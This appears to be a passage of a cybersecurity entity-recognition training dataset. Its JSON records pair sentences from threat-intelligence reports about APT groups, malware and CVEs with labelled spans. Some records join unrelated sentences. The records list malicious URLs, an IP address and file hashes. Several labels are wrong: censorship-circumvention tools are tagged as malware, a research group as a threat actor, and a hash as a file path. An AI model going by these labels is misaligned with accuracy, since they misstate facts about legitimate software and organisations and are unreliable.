in which criminals use APT techniques directly against the financial industry instead of through its customers . 
In some cases , such as Russia , the target appears to be an embassy from one of the countries of this list .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "ORGANIZATION: embassy": [[260, 267]]}, "info": {"id": "cyberner_stix_train_002566", "source": "cyberner_stix_train"}} {"text": "We deployed our IR team and technology and immediately identified two sophisticated adversaries on the network – COZY BEAR and FANCY BEAR .", "spans": {"ORGANIZATION: IR": [[16, 18]], "THREAT_ACTOR: COZY BEAR": [[113, 122]], "THREAT_ACTOR: FANCY BEAR": [[127, 137]]}, "info": {"id": "cyberner_stix_train_002567", "source": "cyberner_stix_train"}} {"text": "His repository proves that he is indeed an Android developer , but it contained no publicly available code of the Ashas adware at the time of writing of this blogpost . The malware continues by creating a service named mssecsvc2.0 with a binary path pointing to the running module with the arguments -m security . SHA256 : 56f159cde3a55ae6e9270d95791ef2f6859aa119ad516c9471010302e1fb5634 .", "spans": {"SYSTEM: Android": [[43, 50]], "MALWARE: Ashas": [[114, 119]], "MALWARE: malware": [[173, 180]], "MALWARE: mssecsvc2.0": [[219, 230]], "FILEPATH: 56f159cde3a55ae6e9270d95791ef2f6859aa119ad516c9471010302e1fb5634": [[323, 387]]}, "info": {"id": "cyberner_stix_train_002568", "source": "cyberner_stix_train"}} {"text": "henbox_2 Figure 1 Uyghurapps [ . These could be tools to circumvent internet censorship , such as Softether VPN 4.12” and psiphon3” , or Microsoft Office activators” . 
APT12 's targets are consistent with larger People 's Republic of China ( PRC ) goals .", "spans": {"MALWARE: Softether VPN 4.12”": [[98, 117]], "MALWARE: psiphon3”": [[122, 131]], "MALWARE: Microsoft Office activators”": [[137, 165]], "THREAT_ACTOR: APT12": [[168, 173]]}, "info": {"id": "cyberner_stix_train_002569", "source": "cyberner_stix_train"}} {"text": "This is due to the fact that the implant needs to escalate privileges before performing social payload actions . Group's targets include high-profile entities such as parliaments , senates , top state offices and officials , political science scholars , military and intelligence agencies , ministries , media outlets , research centers , election commissions , Olympic organizations , large trading companies , and other unknown entities . Turla ’s espionage platform is mainly used against Windows machines , but has also been seen used against macOS and Linux machines .", "spans": {"THREAT_ACTOR: Group's": [[113, 120]], "ORGANIZATION: parliaments": [[167, 178]], "ORGANIZATION: senates": [[181, 188]], "ORGANIZATION: top state offices": [[191, 208]], "ORGANIZATION: officials": [[213, 222]], "ORGANIZATION: political science scholars": [[225, 251]], "ORGANIZATION: military": [[254, 262]], "ORGANIZATION: intelligence agencies": [[267, 288]], "ORGANIZATION: ministries": [[291, 301]], "ORGANIZATION: media outlets": [[304, 317]], "ORGANIZATION: research centers": [[320, 336]], "ORGANIZATION: election commissions": [[339, 359]], "ORGANIZATION: Olympic organizations": [[362, 383]], "ORGANIZATION: trading companies": [[392, 409]], "ORGANIZATION: unknown entities": [[422, 438]], "THREAT_ACTOR: Turla": [[441, 446]], "SYSTEM: Windows": [[492, 499]], "SYSTEM: macOS": [[547, 552]], "SYSTEM: Linux": [[557, 562]]}, "info": {"id": "cyberner_stix_train_002570", "source": "cyberner_stix_train"}} {"text": "sms_grab : to upload periodically the SMS messages in the inbox to C2 server . 
Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . The RAT attempts to download additional payloads and upload the information gathered during the reconnaissance phase . Possible locations are “ Config ” , “ Static ” , or “ Path ” followed by a file path .", "spans": {"ORGANIZATION: Microsoft": [[102, 111]], "VULNERABILITY: CVE-2017-11882": [[131, 145]], "ORGANIZATION: FireEye": [[166, 173]], "THREAT_ACTOR: attacker": [[186, 194]], "VULNERABILITY: Microsoft Office vulnerability": [[220, 250]], "ORGANIZATION: government organization": [[263, 286]], "TOOL: RAT": [[312, 315]]}, "info": {"id": "cyberner_stix_train_002571", "source": "cyberner_stix_train"}} {"text": "After achieving root access , Gooligan downloads a new , malicious module from the C & C server and installs it on the infected device . Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . the variable v5 in pseudocode is a register operand ( cl ) Recently , concerns have grown regarding the rapid growth of commercial spyware tools , and the way in which they are being used against their intended victims .", "spans": {"MALWARE: Gooligan": [[30, 38]], "ORGANIZATION: Kaspersky": [[137, 146]], "THREAT_ACTOR: BlackOasis group": [[157, 173]], "VULNERABILITY: Adobe Flash Player zero-day vulnerability": [[191, 232]], "VULNERABILITY: CVE-2016-4117": [[235, 248]], "TOOL: FinSpy": [[295, 301]]}, "info": {"id": "cyberner_stix_train_002572", "source": "cyberner_stix_train"}} {"text": "The most widely infected major Android versions are KitKat with 50 percent , followed by Jelly Bean with 40 percent . 
If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit . APT33 : 64.251.19.231 [REDACTED].ddns.net . Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": {"SYSTEM: Android": [[31, 38]], "SYSTEM: KitKat": [[52, 58]], "SYSTEM: Jelly Bean": [[89, 99]], "TOOL: DoublePulsar backdoor": [[125, 146]], "TOOL: SMB worm": [[173, 181]], "VULNERABILITY: Eternalblue SMBv1 exploit": [[226, 251]], "THREAT_ACTOR: APT33": [[254, 259]], "IP_ADDRESS: 64.251.19.231": [[262, 275]], "DOMAIN: [REDACTED].ddns.net": [[276, 295]]}, "info": {"id": "cyberner_stix_train_002573", "source": "cyberner_stix_train"}} {"text": "The MoleRATs group have been known to use this packer in previous attacks .", "spans": {"THREAT_ACTOR: MoleRATs": [[4, 12]]}, "info": {"id": "cyberner_stix_train_002574", "source": "cyberner_stix_train"}} {"text": "Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . As recently as this past week , researchers observed Chinese hackers escalating cyber-attack efforts to steal military research secrets from US universities .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "TOOL: NetTraveler": [[31, 42]], "VULNERABILITY: CVE-2012-0158": [[64, 77]], "TOOL: NetTraveler Trojan": [[89, 107]], "ORGANIZATION: universities": [[254, 266]]}, "info": {"id": "cyberner_stix_train_002575", "source": "cyberner_stix_train"}} {"text": "When this HTTP request completes , the event listener will call the ‘ onload1 ’ function .", "spans": {}, "info": {"id": "cyberner_stix_train_002576", "source": "cyberner_stix_train"}} {"text": "Method onPostExecute parses the response from the above HTTP session and executes the commands provided by the remote attacker . 
The group behind the OilRig campaign continues to leverage spear-phishing emails with malicious Microsoft Excel documents to compromise victims . Today , Cisco Talos is unveiling the details of a new RAT we have identified we 're calling \" JhoneRAT \" . Lateral Movement to SCADA Hypervisor and OT Attack Execution", "spans": {"THREAT_ACTOR: group": [[133, 138]], "ORGANIZATION: Cisco Talos": [[283, 294]], "TOOL: RAT": [[329, 332]], "MALWARE: JhoneRAT": [[369, 377]], "SYSTEM: SCADA Hypervisor": [[402, 418]]}, "info": {"id": "cyberner_stix_train_002577", "source": "cyberner_stix_train"}} {"text": "The reverse DNS history of this IP brought “ ads.i * * * e.com ” into our attention . The reason for this is likely the availability of exploits against web browsers , which for a variety of reasons allows an attacker to bypass security features such as Data Execution Prevention ( DEP ) or Address Space Layout Randomization ( ASLR ) . As a final fail-safe , Dexphot uses schtasks.exe to create scheduled tasks . We also utilized this data to build higher - fidelity detections of web server process chains .", "spans": {"FILEPATH: schtasks.exe": [[373, 385]], "THREAT_ACTOR: web server process chains": [[482, 507]]}, "info": {"id": "cyberner_stix_train_002578", "source": "cyberner_stix_train"}} {"text": "Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 — the same date the first authenticated login to Visma’s network was made using stolen credentials . 
Tweety Chat 's Android version can record audio , too .", "spans": {"THREAT_ACTOR: Insikt Group": [[0, 12]], "MALWARE: Citrix-hosted": [[111, 124]], "MALWARE: Tweety Chat": [[302, 313]], "SYSTEM: Android": [[317, 324]]}, "info": {"id": "cyberner_stix_train_002579", "source": "cyberner_stix_train"}} {"text": "Specifically , one organization is geographically located in Europe and the other in North America .", "spans": {}, "info": {"id": "cyberner_stix_train_002580", "source": "cyberner_stix_train"}} {"text": "Allows an application to collect battery statistics Allows an app to access precise location . By the end of 2016 , the CIA's hacking division , which formally falls under the agency's Center for Cyber Intelligence (CCI) , had over 5000 registered users and had produced more than a thousand hacking systems , trojans , viruses , and other weaponized malware . APT32 is a threat group that has been active since at least 2014 .", "spans": {"THREAT_ACTOR: CIA's hacking division": [[120, 142]], "TOOL: hacking systems": [[292, 307]], "TOOL: trojans": [[310, 317]], "TOOL: viruses": [[320, 327]], "TOOL: weaponized malware": [[340, 358]], "THREAT_ACTOR: APT32": [[361, 366]]}, "info": {"id": "cyberner_stix_train_002581", "source": "cyberner_stix_train"}} {"text": "COVERAGE Cisco Cloud Web Security ( CWS ) or Web Security Appliance ( WSA ) web scanning prevents access to malicious websites and detects malware used in these attacks . Observed Seedworm victims were located primarily in Pakistan and Turkey , but also in Russia , Saudi Arabia , Afghanistan , Jordan , and elsewhere . This VBScript is obfuscated and contains packed data that is used to infect a target with multiple chained persistent artifacts . 
This third - stage backdoor is tracked as DOUBLEBACK .", "spans": {"ORGANIZATION: Cisco": [[9, 14]], "SYSTEM: Cloud Web Security": [[15, 33]], "SYSTEM: Web Security Appliance": [[45, 67]], "THREAT_ACTOR: Seedworm": [[180, 188]], "TOOL: VBScript": [[325, 333]], "TOOL: third - stage backdoor": [[455, 477]], "TOOL: DOUBLEBACK": [[492, 502]]}, "info": {"id": "cyberner_stix_train_002582", "source": "cyberner_stix_train"}} {"text": "I decided to debug the macro and see exactly what it ’s doing before I made any decisions .", "spans": {}, "info": {"id": "cyberner_stix_train_002583", "source": "cyberner_stix_train"}} {"text": "The WIZARD SPIDER threat group is the Russia-based operator of the TrickBot banking malware . FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": {"THREAT_ACTOR: WIZARD SPIDER threat group": [[4, 30]], "TOOL: TrickBot banking malware": [[67, 91]], "ORGANIZATION: FireEye": [[94, 101]], "THREAT_ACTOR: APT37": [[148, 153]], "VULNERABILITY: zero-day": [[166, 174]], "TOOL: Adobe Flash": [[175, 186]], "VULNERABILITY: CVE-2018-4878": [[203, 216]], "MALWARE: DOGCALL": [[233, 240]], "MALWARE: malware": [[241, 248]]}, "info": {"id": "cyberner_stix_train_002584", "source": "cyberner_stix_train"}} {"text": "The malicious macro code first decodes a string which contains a reference to the pastebin url .", "spans": {"TOOL: malicious macro code": [[4, 24]]}, "info": {"id": "cyberner_stix_train_002585", "source": "cyberner_stix_train"}} {"text": "Using the Dynamic Threat Intelligence Cloud ( DTI ) , FireEye researchers detected a pattern of attacks beginning on April 13th , 2015 .", "spans": {"TOOL: Dynamic Threat Intelligence Cloud": [[10, 43]], "TOOL: DTI": [[46, 49]], "ORGANIZATION: FireEye": [[54, 61]]}, "info": {"id": "cyberner_stix_train_002586", "source": "cyberner_stix_train"}} {"text": "Now we dig deep in the C2 to 
explain how it work and how i created the agent based on the function available in the C2 .", "spans": {"TOOL: C2": [[23, 25], [116, 118]]}, "info": {"id": "cyberner_stix_train_002587", "source": "cyberner_stix_train"}} {"text": "Some of the more interesting commands include : SMS Control Update the address of the C & C server — SMS starting with “ http : // ” Send AES-encrypted SMS message back to sender — SMS starting with “ sms : // ” Update service wake-up interval — “ 2 ” Kill switch — “ 4 ” C & C Control Update the address of the C & C server — “ 1 ” Update service wake-up interval — “ 2 ” Lock the screen — “ 5 ” Display a picture in a WebView from an arbitrary URL — “ 11 ” Send an arbitrary SMS message — “ 8 ” Steal images But according to Gnosticplayers , his foray into a public marketplace like Dream has two goals --besides the first and obvious one being money . Additionally , Starloader was also observed deploying additional tools used by the attackers , such as credential dumpers and keyloggers .", "spans": {"MALWARE: Starloader": [[670, 680]], "MALWARE: credential dumpers": [[758, 776]], "MALWARE: keyloggers": [[781, 791]]}, "info": {"id": "cyberner_stix_train_002588", "source": "cyberner_stix_train"}} {"text": "As can be observed , the possibilities offered by the bot are pretty common . Our research from 2017 concluded that Guangdong ITSEC (and therefore the MSS) directed the activities of a company named Boyusec , which was identified as a shell company for APT3 . 
Though we don’t know the targets of these malware samples at the time of writing this article , we suspect the same group is behind these threats for a number of reasons .", "spans": {"THREAT_ACTOR: Guangdong ITSEC": [[116, 131]], "ORGANIZATION: Boyusec": [[199, 206]], "THREAT_ACTOR: APT3": [[253, 257]]}, "info": {"id": "cyberner_stix_train_002589", "source": "cyberner_stix_train"}} {"text": "PLATINUM configures its backdoor malware to restrict its activities to victims ' working hours , in an attempt to disguise post-infection network activity within normal user traffic . If KeyBoy is a single component of a larger espionage toolkit , the developers may have realized that this older , static-key based , configuration encoding algorithm was inadvertently providing a link between disparate components of their malware suite .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "MALWARE: KeyBoy": [[187, 193]], "MALWARE: configuration encoding algorithm": [[318, 350]]}, "info": {"id": "cyberner_stix_train_002590", "source": "cyberner_stix_train"}} {"text": "The documents that exploit CVE2017-11882 download another payload — an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script — from the server , which is executed accordingly by the command-line tool mshta.exe . 
The second Windows vulnerability ( CVE-2017-0143 ) was patched in March 2017 after it was discovered to have been used by two exploit tools—EternalRomance and EternalSynergy—that were also released as part of the Shadow Brokers leak .", "spans": {"VULNERABILITY: CVE2017-11882": [[27, 40]], "TOOL: HTML Application": [[71, 87]], "MALWARE: HTA": [[90, 93]], "MALWARE: mshta.exe": [[223, 232]], "SYSTEM: Windows": [[246, 253]], "VULNERABILITY: exploit": [[361, 368]], "THREAT_ACTOR: Shadow Brokers": [[448, 462]]}, "info": {"id": "cyberner_stix_train_002591", "source": "cyberner_stix_train"}} {"text": "The code is heavily obfuscated and made unreadable through name mangling and use of meaningless variable names : Decryption with a twist The malware uses an interesting decryption routine : the string values passed to the decryption function do not correspond to the decrypted value , they correspond to junk code to simply hinder analysis . ministries of foreign affairs in Europe have been targeted and compromised by a threat actor we call Ke3chang . Suspicious message body: The attachment was mentioned in the message body twice, making sure to direct the reader’s attention towards the . 
The arrest makes him the third LockBit affiliate charged in the US since November .", "spans": {"ORGANIZATION: ministries of foreign affairs": [[342, 371]], "THREAT_ACTOR: threat actor": [[422, 434]], "THREAT_ACTOR: Ke3chang": [[443, 451]], "THREAT_ACTOR: LockBit": [[625, 632]]}, "info": {"id": "cyberner_stix_train_002592", "source": "cyberner_stix_train"}} {"text": "Dell Secureworks analysts recently concluded that domains discussed in the IBM report were linked to the Iranian PuppyRAT .", "spans": {"ORGANIZATION: Dell": [[0, 4]], "ORGANIZATION: IBM": [[75, 78]], "THREAT_ACTOR: PuppyRAT": [[113, 121]]}, "info": {"id": "cyberner_stix_train_002593", "source": "cyberner_stix_train"}} {"text": "Following screenshot shows this functionality in action : Other functions In addition to the functionalities we ’ ve described , the SpyNote RAT was exhibiting many other behaviors that make it more robust than most off-the-shelf malware . On 24 March 2019 , Silence.ProxyBot (MD5 2fe01a04d6beef14555b2cf9a717615c) was uploaded to VirusTotal from an IP address in Sri Lanka . The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over a 100 financial institutions worldwide has been arrested in Alicante , Spain , after a complex investigation conducted by the Spanish National Police .", "spans": {"MALWARE: SpyNote RAT": [[133, 144]], "MALWARE: Silence.ProxyBot": [[259, 275]], "THREAT_ACTOR: crime gang": [[394, 404]], "MALWARE: Carbanak": [[416, 424]], "ORGANIZATION: financial institutions": [[473, 495]]}, "info": {"id": "cyberner_stix_train_002594", "source": "cyberner_stix_train"}} {"text": "The developers of Charger gave it everything they had to boost its evasion capabilities and so it could stay hidden on Google Play for as long as possible . 
An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims . We analyzed AveMaria targets during February and March of 2019 . As Google Analytics is allowed in the CSP configuration of many major sites , this demo shows how an attacker can bypass this security protection and steal data .", "spans": {"MALWARE: Charger": [[18, 25]], "SYSTEM: Google Play": [[119, 130]], "ORGANIZATION: banking": [[251, 258]], "ORGANIZATION: bank employees": [[346, 360]], "MALWARE: AveMaria": [[430, 438]], "SYSTEM: Google Analytics": [[486, 502]], "SYSTEM: CSP": [[521, 524]], "THREAT_ACTOR: attacker": [[584, 592]]}, "info": {"id": "cyberner_stix_train_002595", "source": "cyberner_stix_train"}} {"text": "This particular case is not an exception . In the early part of 2017 , Group123 started the \" Evil New Year \" campaign . For example , The Regin malware platform supports many standard protocols , including SMB.[10 ] Rocke issued wget requests from infected systems to the C2.[11 ] Siloscape connects to an IRC server for C2.[12 ]", "spans": {"THREAT_ACTOR: Group123": [[71, 79]], "TOOL: Regin malware platform": [[139, 161]], "TOOL: SMB.[10": [[207, 214]], "MALWARE: Rocke": [[217, 222]], "TOOL: wget": [[230, 234]], "SYSTEM: C2.[11": [[273, 279]], "MALWARE: Siloscape": [[282, 291]], "SYSTEM: IRC server": [[307, 317]], "SYSTEM: C2.[12": [[322, 328]]}, "info": {"id": "cyberner_stix_train_002596", "source": "cyberner_stix_train"}} {"text": "The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat . 
The infection vector is similar , it uses a similar modified mimikatz application , and it uses a third-party remote access tool , changes system settings to allow concurrent RDP sessions , and so on .", "spans": {"TOOL: Windows 10 Creators Update": [[4, 30]], "ORGANIZATION: Windows Defender ATP": [[66, 86]], "ORGANIZATION: SOC personnel": [[105, 118]], "MALWARE: mimikatz": [[241, 249]], "MALWARE: third-party remote access tool": [[278, 308]], "MALWARE: RDP": [[355, 358]]}, "info": {"id": "cyberner_stix_train_002597", "source": "cyberner_stix_train"}} {"text": "Monitoring Broadcast Events XLoader registers many broadcast receivers in the payload dynamically ( to monitor broadcast events sent between system and applications ) . Two unique malware frameworks , EHDevel and yty , are developed by attackers . The crucial file , at this point of the infection , is the SFX executable named “ uninstall.exe ” .", "spans": {"MALWARE: XLoader": [[28, 35]], "TOOL: EHDevel": [[201, 208]], "TOOL: yty": [[213, 216]], "THREAT_ACTOR: attackers": [[236, 245]], "TOOL: SFX": [[307, 310]], "FILEPATH: uninstall.exe": [[330, 343]]}, "info": {"id": "cyberner_stix_train_002598", "source": "cyberner_stix_train"}} {"text": "The Magnitude EK landing page consisted of CVE-2016-0189 , which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched . In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company .", "spans": {"TOOL: Magnitude EK": [[4, 16]], "VULNERABILITY: CVE-2016-0189": [[43, 56]], "ORGANIZATION: FireEye": [[87, 94]], "TOOL: Neutrino Exploit Kit": [[112, 132]], "THREAT_ACTOR: APT37": [[170, 175]], "ORGANIZATION: board member": [[242, 254]], "ORGANIZATION: financial company": [[275, 292]]}, "info": {"id": "cyberner_stix_train_002599", "source": "cyberner_stix_train"}} {"text": "] 205 [ . 
Importantly , PinchDuke trojan samples always contain a notable text string , which we believe is used as a campaign identifier by the Dukes group to distinguish between multiple attack campaigns that are run in parallel . A previous blog post by enigma0x3 , detailed how this CLSID can be leveraged to instantiate the ShellBrowserWindow object and call the ShellExecute method , which is the same approach that was taken by the attackers . An adversary could potentially instruct a control systems device to perform an action that will cause an Impact", "spans": {"TOOL: PinchDuke trojan samples": [[24, 48]], "THREAT_ACTOR: Dukes group": [[145, 156]], "TOOL: ShellBrowserWindow": [[329, 347]], "TOOL: ShellExecute": [[368, 380]], "VULNERABILITY: An adversary could potentially instruct a control systems device to perform an action that will cause an Impact": [[451, 562]]}, "info": {"id": "cyberner_stix_train_002600", "source": "cyberner_stix_train"}} {"text": "The loader first dynamically rebuilds a simple import address table ( IAT ) , resolving all the API needed from Kernel32 and NtDll libraries . The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method , specifically attempting to load MagicHound.Rollover . Winnti : bb4ab0d8d05a3404f1f53f152ebd79f4ba4d4d81 2018-10-10 09:57:31 http://checkin.travelsanignacio.com . 
Developed in - house using C++ , the NoEscape ransomware uses a hybrid approach to encryption , combining ChaCha20 and RSA encryption algorithms for file encryption and key protection .", "spans": {"TOOL: MagicHound.Rollover": [[281, 300]], "THREAT_ACTOR: Winnti": [[303, 309]], "FILEPATH: bb4ab0d8d05a3404f1f53f152ebd79f4ba4d4d81": [[312, 352]], "URL: http://checkin.travelsanignacio.com": [[373, 408]], "MALWARE: NoEscape ransomware": [[448, 467]]}, "info": {"id": "cyberner_stix_train_002601", "source": "cyberner_stix_train"}} {"text": "In this case , we can see that the HTML code of the overlay is stored in the C2 infrastructure . As MuddyWater has consistently been using POWERSTATS as its main tool , they are relatively easy to distinguish from other actors . This DLL requires the loading executable to include a 32-byte key on the command line to be able to decrypt the embedded payload , which unfortunately we do not have . Sandworm later conducted a second disruptive event by deploying a new variant of CADDYWIPER in the victim ’s IT environment .", "spans": {"THREAT_ACTOR: MuddyWater": [[100, 110]], "TOOL: POWERSTATS": [[139, 149]], "THREAT_ACTOR: actors": [[220, 226]], "TOOL: DLL": [[234, 237]], "THREAT_ACTOR: Sandworm": [[397, 405]], "MALWARE: CADDYWIPER": [[478, 488]]}, "info": {"id": "cyberner_stix_train_002602", "source": "cyberner_stix_train"}} {"text": "Sample 2 , has the package name cn.android.setting masquerading as Android ’ s Settings app , which has a similar package name ( com.android.settings ) . For example , Donot and Bitter disguised as Kashmiri Voice to attack Pakistan , Transparent Tribe attacked India with decoy document regarding terrorist attacks in Kashmir . 
TG-0416 is a stealthy and extremely successful Advanced Persistent Threat ( APT ) group known to target a broad range of verticals since at least 2009 , including technology , industrial , manufacturing , human rights groups , government , pharmaceutical , and medical technology .", "spans": {"SYSTEM: Settings app": [[79, 91]], "THREAT_ACTOR: Donot": [[168, 173]], "THREAT_ACTOR: Bitter": [[178, 184]], "THREAT_ACTOR: TG-0416": [[328, 335]], "ORGANIZATION: technology": [[491, 501]], "ORGANIZATION: industrial": [[504, 514]], "ORGANIZATION: manufacturing": [[517, 530]], "ORGANIZATION: human rights groups": [[533, 552]], "ORGANIZATION: government": [[555, 565]], "ORGANIZATION: pharmaceutical": [[568, 582]], "ORGANIZATION: medical technology": [[589, 607]]}, "info": {"id": "cyberner_stix_train_002603", "source": "cyberner_stix_train"}} {"text": "Office 365 ATP blocks unsafe attachments , malicious links , and linked-to files using time-of-click protection . Poison Ivy is a remote access tool that is freely available for download from its official web site at www.poisonivy-rat.com . OceanLotus : {68DDB1F1-E31F-42A9-A35D-984B99ECBAAD} registry path varies SOFTWARE\\Classes\\CLSID\\{57C3E2E2-C18F-4ABF-BAAA-9D17879AB029} . 
Mandiant is investigating intrusions across multiple verticals , including legal and professional services , technology , and government organizations .", "spans": {"SYSTEM: Office 365 ATP": [[0, 14]], "TOOL: Poison Ivy": [[114, 124]], "THREAT_ACTOR: OceanLotus": [[241, 251]], "ORGANIZATION: legal and professional services , technology , and government organizations": [[453, 528]]}, "info": {"id": "cyberner_stix_train_002604", "source": "cyberner_stix_train"}} {"text": "2015-01-20 to present time http : //217.194.13.133/190/configurazione/vodafone/smartphone/Vodafone % 20Configuratore.apk http : //217.194.13.133/190/configurazione/vodafone/smartphone/index.html currently active http : //vodafoneinfinity.sytes.net/tim/internet/Configuratore_TIM.apk http : //vodafoneinfinity.sytes.net/tim/internet/ 2015-03-04 http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/VODAFONE Data points span from September 2018 to January 2019 where we observed over 17 million downloads in just five months . 
APT1 is a Chinese threat group that has been attributed to the 2nd Bureau of the People ’s Liberation Army ( PLA ) General Staff Department ’s ( GSD ) 3rd Department , commonly known by its Military Unit Cover Designator ( MUCD ) as Unit 61398 .", "spans": {"ORGANIZATION: we": [[487, 489]], "THREAT_ACTOR: APT1": [[547, 551]], "ORGANIZATION: 2nd Bureau of the People ’s Liberation Army": [[610, 653]], "ORGANIZATION: PLA": [[656, 659]], "ORGANIZATION: General Staff Department ’s": [[662, 689]], "ORGANIZATION: GSD": [[692, 695]], "ORGANIZATION: 3rd Department": [[698, 712]], "ORGANIZATION: Military Unit Cover Designator": [[737, 767]], "ORGANIZATION: MUCD": [[770, 774]], "ORGANIZATION: Unit 61398": [[780, 790]]}, "info": {"id": "cyberner_stix_train_002605", "source": "cyberner_stix_train"}} {"text": "The Cobalt Strike tool has malleable C2 profiles .", "spans": {"TOOL: Cobalt Strike": [[4, 17]], "TOOL: C2": [[37, 39]]}, "info": {"id": "cyberner_stix_train_002606", "source": "cyberner_stix_train"}} {"text": "The incomplete iOS codes used in this campaign may have been bought while other capabilities appear to have been added . of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States . The modified code checks the tail instruction and if the true case destination is a control flow dispatcher , JumpCloud reported this unauthorized access impacted fewer than five customers and less than 10 devices .", "spans": {"SYSTEM: iOS": [[15, 18]], "THREAT_ACTOR: Gorgon Group": [[156, 168]], "ORGANIZATION: governmental organizations": [[179, 205]], "ORGANIZATION: JumpCloud": [[381, 390]]}, "info": {"id": "cyberner_stix_train_002607", "source": "cyberner_stix_train"}} {"text": "The newer version of FakeSpy uses new URL addresses for malicious communication with FakeSpy . They also use AutoIT droppers , password-protected EXE files and even ISO images . 
Furthermore , FireEye has presented evidence indicating that the Ke3chang attackers have been active since at least 2010 and have attacked targets related to G20 meetings in the past .", "spans": {"MALWARE: FakeSpy": [[21, 28], [85, 92]], "THREAT_ACTOR: They": [[95, 99]], "TOOL: AutoIT droppers": [[109, 124]], "ORGANIZATION: FireEye": [[192, 199]], "THREAT_ACTOR: Ke3chang": [[243, 251]], "THREAT_ACTOR: attackers": [[252, 261]], "ORGANIZATION: G20 meetings": [[336, 348]]}, "info": {"id": "cyberner_stix_train_002608", "source": "cyberner_stix_train"}} {"text": "The first signed hacktool we identified in late 2015 was a digitally signed brute-force server message block ( SMB ) scanner .", "spans": {"TOOL: server message block": [[88, 108]], "TOOL: SMB": [[111, 114]]}, "info": {"id": "cyberner_stix_train_002609", "source": "cyberner_stix_train"}} {"text": "Thanks to this data leak , we were able to confirm that the malware really worked as designed : the attacker had access to the victims ’ entered credentials , displayed or written emails and messages , etc . In 2018 , Kaspersky Labs published a report that analyzed a Turla PowerShell loader that was based on the open-source project Posh-SecMod . 
FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors .", "spans": {"ORGANIZATION: Kaspersky": [[218, 227]], "THREAT_ACTOR: Turla": [[268, 273]], "TOOL: PowerShell loader": [[274, 291]], "MALWARE: FALLCHILL": [[348, 357]], "MALWARE: HIDDEN COBRA malware": [[412, 432]], "THREAT_ACTOR: HIDDEN COBRA actors": [[513, 532]]}, "info": {"id": "cyberner_stix_train_002610", "source": "cyberner_stix_train"}} {"text": "Additionally , we can see there were at least 3 very large campaigns where Palo Alto Networks saw activity to these sites in July .", "spans": {}, "info": {"id": "cyberner_stix_train_002611", "source": "cyberner_stix_train"}} {"text": "We have noticed that hundreds of the email addresses are associated with enterprise accounts worldwide . APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition . During the callback , It incorporates the capabilities of the FULLHOUSE tunneler in addition to supporting backdoor commands including shell command execution , file transfer , file management , and process injection .", "spans": {"THREAT_ACTOR: APT38": [[105, 110]], "ORGANIZATION: banks": [[156, 161]], "ORGANIZATION: financial institutions": [[172, 194]]}, "info": {"id": "cyberner_stix_train_002612", "source": "cyberner_stix_train"}} {"text": "Some of them are iOS versions of the ones removed from Google Play , but none contain adware functionality . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . 
SHA256 : 553a475f72819b295927e469c7bf9aef774783f3ae8c34c794f35702023317cc .", "spans": {"SYSTEM: iOS": [[17, 20]], "SYSTEM: Google Play": [[55, 66]], "MALWARE: flare-qdb": [[127, 136]], "FILEPATH: 553a475f72819b295927e469c7bf9aef774783f3ae8c34c794f35702023317cc": [[204, 268]]}, "info": {"id": "cyberner_stix_train_002613", "source": "cyberner_stix_train"}} {"text": "The Shadow Brokers first emerged in August , when they posted links to a selection of NSA exploits and hacking tools onto Github and other websites . Taiwan has been a regular target of Cyber Espionage threat actors for a number of years .", "spans": {"VULNERABILITY: NSA exploits": [[86, 98]]}, "info": {"id": "cyberner_stix_train_002614", "source": "cyberner_stix_train"}} {"text": "While our systems are great at automatically detecting and protecting against PHAs , we believe the best security comes from the combination of automated scanning and skilled human review . The first attack in the US that Group-IB attributes to this group was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal . The successful exploitation of both vulnerabilities led to the delivery of either a downloader that we refer to as IRONHALO , or a backdoor that we refer to as ELMER . This second , partially obfuscated web shell , named iisstart.aspx ( MD5 : 0fd9bffa49c76ee12e51e3b8ae0609ac ) , was more advanced and contained functions to interact with the file system .", "spans": {"ORGANIZATION: Group-IB": [[222, 230]], "ORGANIZATION: bank": [[320, 324]], "MALWARE: IRONHALO": [[510, 518]], "MALWARE: ELMER": [[555, 560]], "SYSTEM: the file system": [[734, 749]]}, "info": {"id": "cyberner_stix_train_002615", "source": "cyberner_stix_train"}} {"text": "However , binding a shell on all available interfaces will obviously make it accessible to anyone who is sharing at least a local network with an infected device . 
